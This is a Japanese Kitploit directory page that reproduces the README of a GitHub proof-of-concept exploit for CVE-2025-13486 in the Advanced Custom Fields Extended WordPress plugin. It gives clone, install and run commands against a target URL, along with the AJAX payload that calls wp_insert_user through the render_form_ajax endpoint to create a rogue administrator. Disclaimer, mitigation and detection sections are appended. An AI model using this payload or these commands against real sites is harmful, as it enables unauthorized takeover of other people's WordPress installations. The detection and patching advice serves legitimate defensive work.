Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress プラグインのエクスプロイト RCE - 管理者作成 | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress プラグインのエクスプロイト RCE - 管理者作成

リポジトリを見る
118ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔴 CVE-2025-13486 - Advanced Custom Fields Extended (ACFE) WordPressプラグインエクスプロイト

WordPress Python License Status

WordPress ロゴ

📋 概要

CVE-2025-13486 の概念実証エクスプロイトです。これは Advanced Custom Fields: Extended (ACFE) WordPressプラグインの深刻な脆弱性で、リモートコード実行から権限昇格を可能にします。

🎯 脆弱性の詳細

側面詳細
CVE IDCVE-2025-13486
プラグインAdvanced Custom Fields: Extended (ACFE)
タイプリモートコード実行 → 権限昇格
リスクレベル深刻
影響を受けるバージョンACFEの脆弱なバージョン(具体的なバージョンは未定)
CVSSスコア9.8 深刻
発見日2025
作成者0xgh057r3c0n

⚠️ 倫理的使用に関する免責事項

⚠️ 警告: このツールは許可されたセキュリティテストおよび教育目的のみに使用できます。

✅ 許可された使用:

  • セキュリティ研究と教育
  • 自身のシステムのテスト
  • 書面による許可を得た正規の侵入テスト
  • 学術研究と教育
  • セキュリティ意識向上トレーニング

❌ 禁止された使用:

  • 所有していないシステムの無許可テスト
  • 悪意のある攻撃やハッキング
  • 違法行為
  • コンピュータ不正アクセス法(CFAA等)の違反
  • 非倫理的なセキュリティテスト

作成者はこのツールの誤用について一切の責任を負いません。システムをテストする前に必ず適切な書面による許可を取得してください。

🔧 特徴

🔍 検証モード

  • WordPressページからのnonce抽出
  • print_r関数を使用した脆弱性の確認
  • 悪用を伴わない安全な検証
  • nonce検出のための複数パターンマッチング

⚡ エクスプロイトモード

  • wp_insert_userによる管理者ユーザー作成
  • カスタムまたはランダム生成の認証情報
  • カスタムユーザー名、パスワード、メールアドレスのサポート
  • 成功指標の応答解析

🛠️ 技術的特徴

  • 自動プロトコル検出(HTTP/HTTPS)
  • カラーコード化された端末出力
  • テスト環境向けSSL検証バイパス
  • 詳細なエラー報告とデバッグ
  • セッションタイムアウトと接続処理

📦 インストール

必要条件

  • Python 3.6+
  • requestsライブラリ

セットアップ

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# 依存関係のインストール
pip install requests

# または requirements.txt からインストール
pip install -r requirements.txt

# スクリプトを実行可能にする (Linux/Mac)
chmod +x exploit.py

依存関係

requirements.txt ファイルを作成します:

root@kitploit:~
requests>=2.25.1

🚀 使い方

基本構文

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

例

1. 脆弱性の確認のみ(安全なテスト)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. ランダムな認証情報でエクスプロイト

root@kitploit:~
python3 exploit.py --url https://target.com

3. カスタム認証情報でエクスプロイト

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. プロトコルなしのターゲット(自動検出)

root@kitploit:~
python3 exploit.py --url target.com --verify

コマンドラインオプション

🧪 動作原理

1. 脆弱性メカニズム

このエクスプロイトは、ACFEプラグインの acfe/form/render_form_ajax エンドポイントにおける不適切な関数ハンドリングを悪用し、攻撃者に任意のPHP関数を呼び出させるものです。

2. 技術的フロー

root@kitploit:~
1. URLの検証 → HTTP/HTTPSを自動検出
2. Nonceの抽出 → ページをスキャンしてACF nonceを取得
3. ペイロードの構築 → 悪意のあるAJAXリクエストを作成
4. リクエストの実行 → ターゲットにエクスプロイトを送信
5. 結果の分析 → 成功指標を確認

3. エクスプロイトペイロード

root@kitploit:~
// ACFE内の脆弱なコードパターン
$result = call_user_func_array($form['render'], array($form));

// エクスプロイトペイロードの構造
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ 緩和策

即時対応

  1. プラグインの更新: ACFEプラグインを最新バージョンに直ちに更新
  2. プラグインの削除: 更新が利用できない場合は、ACFEを一時的に無効化
  3. Webアプリケーションファイアウォール: WAFルールを展開して悪意のあるリクエストをブロック
  4. 監視: 不審な管理者ユーザー作成を監視

WordPressセキュリティ強化

root@kitploit:~
# 推奨セキュリティプラグイン
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# サーバーレベルの保護
- レート制限の実装
- mod_securityルールの有効化
- Cloudflareまたは類似のCDNの使用
- 定期的なセキュリティ監査

🔍 検出

侵害指標 (IOC)

  • 許可されていない管理者ユーザーの作成
  • /wp-admin/admin-ajax.php への不審なAJAXリクエスト
  • action=acfe/form/render_form_ajax を含むリクエスト
  • AJAX経由の予期しない wp_insert_user 関数呼び出し

ログ監視

root@kitploit:~
# Apacheログ
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPressデバッグログ
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 参考資料

  1. WordPressプラグインディレクトリ: Advanced Custom Fields: Extended
  2. CVEデータベース: CVE-2025-13486
  3. WordPressセキュリティチーム: プラグインセキュリティガイドライン
  4. OWASP Top 10: インジェクション攻撃

🤝 貢献

  1. リポジトリをフォーク
  2. 機能ブランチを作成 (git checkout -b feature/improvement)
  3. 変更をコミット (git commit -am '新機能を追加')
  4. ブランチにプッシュ (git push origin feature/improvement)
  5. プルリクエストを作成

貢献者ガイドライン

  • PEP 8 Pythonスタイルガイドに従う
  • 複雑なロジックにはコメントを追加
  • エラーハンドリングを含める
  • ドキュメントを更新

🐛 問題の報告

バグや問題は以下の方法で報告してください:

  1. GitHub Issues: 新しいIssueを作成
  2. セキュリティ脆弱性: 最初に作成者に責任ある開示を行う

📊 プロジェクト構造

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # メインエクスプロイトスクリプト
├── README.md           # このドキュメント
├── requirements.txt    # Python依存関係
├── LICENSE            # MITライセンスファイル
├── examples/          # 使用例
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # テストスクリプト
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 作成者

0xgh057r3c0n - セキュリティ研究者

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 ライセンス

このプロジェクトは MITライセンス の下でライセンスされています - 詳細は LICENSE ファイルを参照してください。

セキュリティコミュニティのために ❤️ を込めて作成
⚠️ 責任を持って倫理的に使用してください ⚠️

ツールをダウンロード
オプション説明必須デフォルト
-u, --urlターゲットWordPress URLはい-
--verify確認のみ、悪用なしいいえFalse
--user管理ユーザーのカスタムユーザー名いいえadmin_XXXXX
--password管理ユーザーのカスタムパスワードいいえランダム12文字
--email管理ユーザーのカスタムメールいいえ[email protected]